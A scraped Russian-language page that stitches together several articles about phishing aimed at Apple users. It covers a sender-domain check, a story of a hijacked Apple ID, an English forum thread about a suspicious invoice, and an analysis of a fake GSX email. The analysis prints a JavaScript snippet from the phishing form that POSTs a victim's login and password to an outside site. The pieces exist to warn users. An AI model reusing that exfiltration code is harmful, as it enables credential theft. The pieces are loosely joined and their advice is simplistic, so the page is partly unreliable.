Noreply email apple com что это

Как легко определить фишинговое письмо или сайт «от Apple»

Самый действенный способ.

С начала 2018 года участились случаи массовых фишинговых атак на пользователей техники Apple. Дошло до того, что Apple официально предупредила пользователей о существующей опасности и даже опубликовала специальную статью, в которой рассказала как не попасться на уловки мошенников. Впрочем, защитить себя от фишинговых писем и сайтов достаточно просто. В этой инструкции рассказали как самым простым образом определять любые попытки проведения фишинговой атаки на вас.

Фишинговые атаки являются самыми популярными среди хакеров в последние несколько лет. Причина заключается в их действенности. Согласно статистике, по количеству жертв фишинг находится на уверенном первом месте среди всех типов хакерских атак. Именно поэтому пользователям устройств Apple важно знать о том, как себя защитить.

Как легко определить фишинговое письмо или сайт «от Apple»

В своей статье о противодействии фишинговым атакам, Apple отмечала, что компании никогда не запрашивает у пользователей по электронной почте полный номер кредитной карты, ее CCV-код, а также девичью фамилию матери и номер социального страхования. Однако изучать пришедшее письмо на наличие подобных запросов вовсе необязательно.

Достаточно посмотреть на адрес отправителя. Письма от Apple приходят только с почтовых адресов с доменом apple.com. Если письмо пришло с почтового ящика с любым другим доменом, то вы видите перед собой фишинговое письмо.

Так, официальные письма об оплате подписок от Apple приходят с адреса почтового no_reply@email.apple.com. Ответы от службы поддержки с адреса AppleSupport@email.apple.com и т.д. Во всех случаях домен почтовых адресов apple.com.

Важно! Письма, полученные с почтовых адресов с доменом iCloud.com, могут быть фишинговыми, так как почту в этом домене может зарегистрировать любой желающий.

Таким образом, для того, чтобы не попасться на фишинговые письма достаточно при получении любого письма якобы от Apple проверить с какого почтового ящика пришло сообщение. Это займет всего пару секунд, но может спасти вас от крайне серьезных неприятностей.

Ранее мы рассказывали про общие рекомендации, которые позволяют определить фишинговый сайт или письмо.

Источник

Взломали Apple ID, что делать в этом случае — реальная история

С развитием облачных сервисов все больше пользователей отказываются от физических носителей информации, что заставляет специалистов по безопасности постоянно разрабатывать новые системы защиты конфиденциальных данных. Однако у этой медали две стороны.

В этом материале мы расскажем реальную историю, которая наглядно демонстрирует последствия пренебрежительного отношения к рекомендациям по защите собственных данных. Речь в очередной раз пойдет о взломе аккаунта Apple ID, который является исключительным идентификатором владельца яблочного устройства — будь-то iPhone, iPad или Mac. Стоит отметить, что случаи, подобные описанному ниже, случаются повсеместно, но это не мешает мошенникам находить новых жертв и зарабатывать на их легкомыслии.

Видеообзор

Итак, в нашу редакцию, расположеную в городе Минске, обратился белорусский пользователь, iPhone 6 Plus которого был заблокирован мошенническим способом путем кражи Apple ID.

Как именно третьи лица получили доступ к учетной записи Apple ID неизвестно, вероятнее всего, владелец устройства использовал слишком простой пароль или ввел его на «фишинговом» сайте. К слову, почта, являющаяся логином Apple ID нашего героя имела вид ivanov@yandex.ru, а пароль Ivanov1988. Как видите, подобрать такой пароль достаточно не так уж и сложно.

Так или иначе, доступ к iCloud был утрачен, смартфон заблокирован, а на E-mail владельца устройства мошенник прислал письмо, пестрящее орфографическими и пунктуационными ошибками. В нем, мошенник, предлагал связаться с ним и уточнить условия разблокировки аккаунта, в противном случае — грозил заблокировать Apple ID навсегда. В этом случае заблокированный iPhone 6 попросту превращается в «кирпич».

В следующем письме был подробно изложен ультиматум — владелец смартфона должен был заплатить 1000 рублей за некий комплекс услуг, включающий разблокировку всех устройств, привязанных ко взломанному Apple ID, а также инструкцию по его защите в будущем.

Не самая крупная сумма и готовые шаблоны сообщений наталкивают на мысль о том, что подобные аферы проворачиваются мошенником (или группой лиц) отнюдь не редко, а данный вид заработка давно поставлен на промышленные рельсы.

Обращение в Apple

Что сделает в таком случае пользователь, честно купивший смартфон и не желающий доплачивать вымогателям, не предоставляющим никаких гарантий? Правильно, обратится в компанию Apple, представительства которой в Беларуси, естественно, нет. Несмотря на то, что Apple славится (в хорошем смысле) своей службой поддержки пользователей, телефонный звонок в московский офис компании предполагает прохождение всех кругов бюрократического ада — ожидание, переключение на нужный отдел, снова ожидание, переключение на нужного специалиста, ожидание…

Чтобы доказать свое право собственности и добиться разблокировки аккаунта или устройства необходимо иметь в наличии чек, выписанный официальным ритейлером Apple при покупке iPhone или iPad.

В крайнем случае, попросят ответить на контрольные вопросы, введенные при регистрации Apple ID.

В нашем случае не было ни чеков, ни вразумительных ответов на контрольные вопросы, результат — 100-долларовый счет за звонок в Москву и нулевой эффект.

Учитывая тот факт, что мошенники просили за разблокировку всего 15 долларов (в эквиваленте), а также наличие на заблокированном аккаунте важнейших для пользователя данных, было решено пополнить бюджет аферистов на требуемую сумму. К счастью, после отправки перевода наш герой получил от мошенников письмо с подробной инструкцией по разблокировке аккаунта и руководством по активации двухэтапной проверки Apple ID (которая, к слову, в Беларуси не работает).

Как защитить Apple ID от «угона»

Что нужно делать для того, чтобы не стать жертвой мошенников? Все очень просто — достаточно следовать рекомендациям Apple, выполнить которые не составит труда.

Во-первых, необходимо установить надежный пароль для аккаунта Apple ID и не водить его нигде, кроме собственных сервисов Apple.

Во-вторых, наверняка запомнить (а лучше записать) ответы на все три контрольных вопроса.

В третьих — полностью обезопасить свой аккаунт при помощи системы двухэтапной проверки (или двухфактороной аутентификации), если таковая поддерживается в вашем регионе.

По теме:

Как взламывают пароль Apple ID при помощи фишинговых писем

Фишинг (англ. fishing — рыбная ловля) — вид мошенничества в Интернете, целью которого является получение доступа к логинам и паролям пользователя.

Настоятельно рекомендуем проверять электронный адрес отправителя письма, пришедшего на Вашу почту. Мошенники зачастую создают шаблон и текст письма, идентичный используемуму в Apple, но подменяют ссылки на собственные сайты, которые, в свою очередь, и воруют данные Apple ID пользователей.

Пример фишинговой страницы (не имеющей отношения к Apple), на которую переходит пользователь из письма и вводит (отдает злоумышленникам) логин и пароль:

Настоящие e-mail адреса Apple

Ниже приведен перечень действительных электронных адресов Apple, по ссылкам из которых переходить безопасно:

Источник

Question: Q: Invoice from no_reply@email.apple.com?

I received an invoice from Apple with a list of purchases I did indeed make recently, however what bothers me is that I usually get my receipts from iTunes, not Apple, and the e-mail content and formats look a little different. The e-mail looks pretty legitimate and it doesn’t ask for any personal information or tell me to click any links, but a Google search on ‘no_reply@email.apple.com ‘ didn’t turn up with anything so I thought I’d ask here to make sure. Is there anything to worry about?

iPad mini Wi-Fi, iOS 8.3

Posted on May 28, 2015 10:08 PM

All replies

Loading page content

Page content loaded

The domain it appears to have been sent from doesn’t actually exist. Either it’s not legitimate or it was somehow sent with invalid header data.

May 28, 2015 10:10 PM

No, it’s OK. This is not an iTunes receipt but an invoice.

May 28, 2015 10:11 PM

My iTunes receipts come from Do_Not_Reply@itunes.com . However, given that you did not click on anything, there wouldn’t be anything to worry about anyway. With that in mind, what kind of purchases were they, hardware?

May 28, 2015 10:12 PM

If you want to confirm everything is legitimate, log into your iTunes Store and check your purchaes there.

I’m not absolutely sure, but I believe the difference in billing method is dependent on exactly which Apple ID related services where used (iTunes Store, Mac Apple Store, App Store, etc.).

Perhaps other Forum members can shine more detail on this issue?

May 28, 2015 10:15 PM

Thank you for the reply! I’m still a bit uneasy though, in the 4+ years I’ve been buying from iTunes, this is the first time I’ve received an invoice.

May 28, 2015 10:16 PM

My receipts usually come from there, too. I made some in-app purchases from a game, from which I’ve made several purchases before but they’ve never sent me an invoice, only receipts from iTunes.

May 28, 2015 10:21 PM

Perhaps the above will help.

May 28, 2015 10:26 PM

I received an email from this address today, and it has my hackles standing up, not entirely sure why. I have had no activity on iTunes for a LONG time (months), but my husband often does things that triggers emails to me. Family sharing etc. This email is about family sharing on iTunes, and asks me to follow a link to sign up, only my husband did this weeks/months ago (when it was first launched, can’t remember how long ago that was). I was first put off by why the email would be sent NOW, and why I’d need to ‘activate’ it, when it’s already been activated for a while. And now the email itself is acting weird, staying on top of all my newer emails that have ticked in during the day, so definitely something that makes me VERY reluctant to act on this email, and rather add it to my blocked-list.

Seeing this topic, I thought it was worth to mention that there ARE some emails coming from no_reply@email.apple.com that wants you to click a link, and that it is worth to be very very careful before doing so. I am not going to attempt the link, so I will not be posting an update on what that actually does.

Dec 4, 2015 5:39 AM

The language used in these e-mails exhibits the poorest grammar ever. I just received one stating that:

We notice that you didn’t use your iTunes account for along time, therefore we are obligate to close your account according to our policy including your i-cloud email also.

but it is not too late, you can save your account I get the access back to our features and services just click On » Save it for me » and follow the instruction, we may as you an extra information as security procedure to insure that are the account holder.

if you don’t need this account, just ignore this message and the account will be terminated in just few days, and we thank again for using our service.

Источник

Внимание! Сегодня нам на почту пришло странное письмо… от Apple

На ваш почтовый ящик часто приходит спам? Он бывает разный: рекламный, с просьбой о помощи каким-то неведомым африканским товарищам, попавшим в сложную финансовую ситуацию, рассылка из сервисов… Сегодня на почтовый адрес нашей редакции пришло любопытное письмо… от Apple.

Вернее, так можно было подумать на первый взгляд, но при детальном рассмотрении содержимого письма стало сразу же понятно, что это фейковый почтовый адрес, цель которого — получение пароля и логина от Apple ID.

Само письмо выглядит следующим образом:

Из короткого сообщения мы узнали, что наша заявка в качестве участника программы Global Service Exchange (GSX) одобрена. Все, что нужно для активации — загрузить прилагающийся архив и ввести данные Apple ID в прилагающейся форме.

Самое интересно в том, что никакой заявки на участие в GSX ни один из членов нашей редакции не подавал.

GSX — это специализированный инструмент, который Apple выдает ограниченному кругу специалистов с целью осуществления сервисного обслуживания в рамках программы AppleCare. В работе используется iOS Diagnostics Apple, либо магазин-посредник, который позволяет связать с устройством клиента для получения необходимой информации.

Полученное письмо действительно выглядит правдоподобно: кратко, по делу, с подтверждением заявки и главной — адрес отправителя. Весьма реалистичный адрес [email protected]le.com — в том же домене, что и Apple и без дополнительных приписок.

Внутри архива есть единственный файл в формате *.shtml. Открываем — обычная форма, которая полностью совпадает с оригиналом от Apple:

Разумеется, вводить Apple ID в подозрительное окно мы не стали.

В прикрепленном файле был обнаружен следующий код:

[jscript]
xmlhttp_rkchk.open(‘POST’,’http://nubetelstore.com/admin3667/123/checkapp2.php’,true);
xmlhttp_rkchk.setRequestHeader(‘Content-Type’,’application/x-www-form-urlencoded;charset=utf8′);
xmlhttp_rkchk.send(‘e=’+accountname+’&p=’+accountpassword);
[/jscript]

Он передает логин и пароль на сайт nubetelstore.com

В whois без палева указан email и телефон хостера. А фишинговый сайт до сих по не заблокирован. Мы сообщим им об этой проблеме.

Хозяева сайта скорее всего не знают о том, что он используется для воровства аккаунтов. Это новый PHP-сайт, беглый осмотр html-кода которого показал, что он возможно был написан людьми, которые не думали о безопасности и делали по принципу: «Чтобы работало». С большой вероятностью nublestore.com был взломан и используется мошенниками без ведома его владельцев.

Как выяснилось, полученное нами письмо — распространенный вариант фишинга, который от имени [email protected] действует с февраля месяца. Достаточно ввести данные своего аккаунта, как вы тут же попадаетесь на крючок злоумышленника и полностью теряете контроль на своим аккаунтом.

Будьте внимательны и никогда не вводите данные своей учетной записи в подозрительные формы. Фишинг — штука тонкая и адрес [email protected] выглядел весьма правдоподобно. Если бы кто-то из нашей большой команды сайта действительно подавал заявку на участие в Global Service Exchange, подвоха мы сразу могли бы и не заметить.

Источник